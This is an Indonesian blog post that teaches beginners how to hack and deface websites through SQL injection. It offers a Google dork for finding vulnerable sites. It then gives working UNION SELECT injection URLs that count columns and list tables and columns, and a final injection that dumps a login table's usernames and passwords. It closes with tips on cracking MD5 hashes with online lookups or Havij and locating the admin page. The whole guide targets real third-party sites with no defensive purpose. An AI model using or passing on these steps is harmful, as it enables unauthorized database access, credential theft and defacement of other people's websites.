Pendekkan url, dan dapatkan uang!

SQL Injection for beginner

Nah, ada yang minat untuk belajar hacking? Atau defacing? Ini nih, ada cara yang gampang buat beginner/pengguna awam nih. Coba dulu deh, SQL Injection. Pertama-tama, sebelum mendeface sebuah situs, kita bisa menggunakan "dork SQL Injection" atau kata kunci SQL Injection dengan bantuan google.
Ketik seperti ini di kotak search google :
inurl:"product.php?id=" & intext:"You have an error in your SQL syntax"

Terus pilih salah satu webnya:
Contoh:
http://www.victim.com/detailproduct.php?id=64

Untuk mengecek bug pada suatu web tambahkan single quote ( ' ) dibelakang url
Contoh:
http://www.victim.com/detailproduct.php?id=64'


Dan jika ada bug, akan muncul pesan error seperti ini:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '\' and b.id=a.cat' at line 1




Lalu, carilah columnnya. Gunakan perintah [ order by ]
Contoh:
http://www.victim.com/detailproduct.php?id=64 order by 1--

Dimulai dengan angka 1, selanjutnya 2, dan seterusnya, hingga muncul pesan error seperti ini :
Unknown column '19' in 'order clause
Itu adalah pesan error yang ditampilkan saat mencoba “order by 19--“
Contoh:
http://www.victim.com/detailproduct.php?id=64 order by 19--

Jadi yang diambil adalah 19-1 = 18 (jumlah column ada 18 column)

Selanjutnya kita akan mencari "angka ajaib" dimana kita bisa melakukan injection dengan perintah "union all select"
Contoh:
http://www.victim.com/detailproduct.php?id=-64 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

Jangan lupa tambahkan tanda minus/kurang ( - ) didepan angka 64

Lalu akan muncul "angka ajaib" : 3, 11 dan 18
Kita pilih salah satunya saja, misalnya kita memilih angka 3

Terus kita cari versi Database MySQLnya dengan perintah [version()] atau [@@version] pada angka 3
Contoh:
http://www.victim.com/detailproduct.php?id=-64 union all select
1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--


Dan ternyata muncul pesan/tulisan seperti ini:
5.0.90-community

Selanjutnya kita akan mencari table-nya dengan perintah "group_concat(table_name)" pada salah satu angka ajaib dengan menambahkan "+from+information_schema.tables+where+table_schema=database()--" di belakang angka 18
Contoh:
http://www.victim.com/detailproduct.php?id=-64 union all select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+where table_schema=database()--

Lalu akan muncul nama-nama table :
Contoh:
login,tbanner,tcatprod,tproduct,tset

Selanjutnya kita cari column dari table yang ada hubungannya dengan user dan password,
kali ini kita ambil table "login"
sebelumnya kita convert dulu ke hexa agar dapat dibaca oleh SQL. Coba cek di sini :
http://cyber4rt.com/~converter
ketik : login
pilih ASCII to Hex
hasilnya : 6c6f67696e

Perintah selanjutnya adalah "group_concat(column_name)" pada angka ajaib 3 dengan menambahkan "+from+information_schema.columns+where+table_name=0xHEXA--" di akhir URL
Ganti HEXA dengan hasil convert tadi yaitu : 6c6f67696e
Tambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert
ke hexa
Contoh:
http://www.victim.com/detailproduct.php?id=-64 union all select
1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.columns+where+table_name=0x6c6f67696e--

Dan ternyata muncul column : user,pass

Untuk melihat isi dari kedua column tersebut gunakan perintah "group_concat(column1,0x3a,column2)" pada angka ajaib 3 dan +from+NAMATABLE-- pada akhir URL

Ganti column 1 dengan "user" dan column2 dengan "pass". 0x3a adalah tanda titik dua ( : ) yang telah diconvert ke hexa. NAMA TABLE diganti dengan "login" untuk mengambil informasi dari table yang bernama "login"
Contoh:
http://www.victim.com/detailproduct.php?id=-64 union all select 1,2,group_concat(user,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+login—

Dan hasilnya : admin:admin
Jadi, yang ditemukan pada pembahasan kali ini adalah user = admin, sedangkan password = admin
Jika anda mendapatkan password yang berupa MD5 seperti "21232f297a57a5a743894a0e4a801fc3" atau yang lainnya, silahkan anda hash di sini http://hashchecker.de/find.html atau bisa menggunakan tool Havij.
Contoh pesan yang ditampilkan :
admin: 21232f297a57a5a743894a0e4a801fc3
Nah, selesai. Tinggal mencari “page login administrator”nya. Silahkan anda cari sendiri, bisa menggunakan Havij juga. Tutorialnya akan saya bahas di pertemuan selanjutnya, so stay tune and cool :D

Take some minutes to give me any comments, critics, and suggestions. Your comments will make this blog to be more attractive [As soon as i read your comments]. Thanks for your comments! Conversion Conversion Emoticon Emoticon

Thanks for your comment